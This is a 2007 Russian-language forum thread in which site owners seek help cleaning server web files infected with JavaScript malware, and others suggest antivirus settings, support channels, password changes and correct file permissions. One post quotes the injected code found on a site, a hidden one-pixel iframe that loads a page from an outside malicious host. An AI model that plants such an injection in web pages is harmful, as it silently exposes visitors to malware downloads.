mixey 0 Опубликовано 13 августа, 2007 Share Опубликовано 13 августа, 2007 Как можно вылечить зараженные файлы на сервере (не предлагать ручное удаление вируса)? Вирус: DoS.JS.Dframe.a Операционная система на сервере: Fedora Core Антивирус касперского находит файлы, но лечить отказывается. Заражены файлы index.php (htm, html и пр расширения). Может существуют какие-либо утилиты для удаления вредоносного кода? Ссылка на сообщение Поделиться на другие сайты
radioelectron 82 Опубликовано 13 августа, 2007 Share Опубликовано 13 августа, 2007 (изменено) Есть Антивирус Касперского для Linux File Server - http://www.kaspersky.ru/anti-virus_linux_file_server Загрузить пробную версию можно отсюда - http://www.kaspersky.ru/anti-virus_fileservers_trial Кстати, компания Untangle совсем недавно назвала Касперского лучшим Linux-антивирусом ЗЫ Внушительный список антивирусов для Линукса (как платных, так и бесплатных) Вы можете посмотреть здесь - http://www.nixp.ru/soft/security_antivir Изменено 14 августа, 2007 пользователем radioelectron Ссылка на сообщение Поделиться на другие сайты
mixey 0 Опубликовано 13 августа, 2007 Автор Share Опубликовано 13 августа, 2007 Linux File Server и установил. Вирус находит, но не лечит, только удаляет. Хотя нужно чтобы удалил только JSвирусный код. Вручную удалить вирусный код очень тяжело (index файлов около 1500) Ссылка на сообщение Поделиться на другие сайты
radioelectron 82 Опубликовано 13 августа, 2007 Share Опубликовано 13 августа, 2007 (изменено) Проверьте настройки антивируса - должен быть включен режим лечения (секция [scanner.options], параметр Cure=yes). Также можно управлять приложением с помощью Kaspersky Administration Kit: Вкладка "Параметры", пункт "Лечить зараженные объекты". Изменено 13 августа, 2007 пользователем radioelectron Ссылка на сообщение Поделиться на другие сайты
mixey 0 Опубликовано 14 августа, 2007 Автор Share Опубликовано 14 августа, 2007 Все установил, режим лечения включен, но файлы не лечатся Ссылка на сообщение Поделиться на другие сайты
radioelectron 82 Опубликовано 14 августа, 2007 Share Опубликовано 14 августа, 2007 (изменено) Значит, остается только два варианта. Если у Вас лицензия - можете зайти на страницу регистрации для клиентов Лаборатории Касперского. И из персонального кабинета написать в техподдержку конкретно по Вашему продукту. И второй способ - попробовать что-нибудь из этого списка Изменено 14 августа, 2007 пользователем radioelectron Ссылка на сообщение Поделиться на другие сайты
Современник 0 Опубликовано 30 августа, 2007 Share Опубликовано 30 августа, 2007 (изменено) У меня тоже с этим большая проблема. Сервер Linux, сайт http://kommersant.org.ua Началось всё месяца два назад, когда Google заблокировал мой сайт, ссылаясь на вредоносное ПО а при открытии сайта - АВК дико пищал, что найден вирус - Trojan-Downloader.JS.Psyme.jm - и блокировал сам сайт. Тогда пересмотрел код главной страницы и нашел там такую запись: <iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>" Удалил. Через три дня код опять появился на сайте. Я удалил - через неделю то же самое. И так до сих пор. Хорошо, что index страниц там всего три - можно и ручками удалить. Может что посоветуете? P.S. В вирусах я мало что пониманию. А антивирусом ЛК пользуюсь уже лет пять наверное. Лицензия - персональная. Изменено 30 августа, 2007 пользователем Современник Ссылка на сообщение Поделиться на другие сайты
AZЪ 188 Опубликовано 31 августа, 2007 Share Опубликовано 31 августа, 2007 Пароль на доступ к контенту сайта попробуйте поменять. Ссылка на сообщение Поделиться на другие сайты
radioelectron 82 Опубликовано 31 августа, 2007 Share Опубликовано 31 августа, 2007 Может что посоветуете? Ни в коем случае нельзя ставить права доступа к файлам 777. У Вас наверняка стоит разрешение на запись, и любой прохожий кулхацкер может запросто перезаписать любой файл вредоносным. Если Вы не понимаете, о чем я говорю - смотрите сюда - http://omsk777.ru/all.php?act=dostup Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти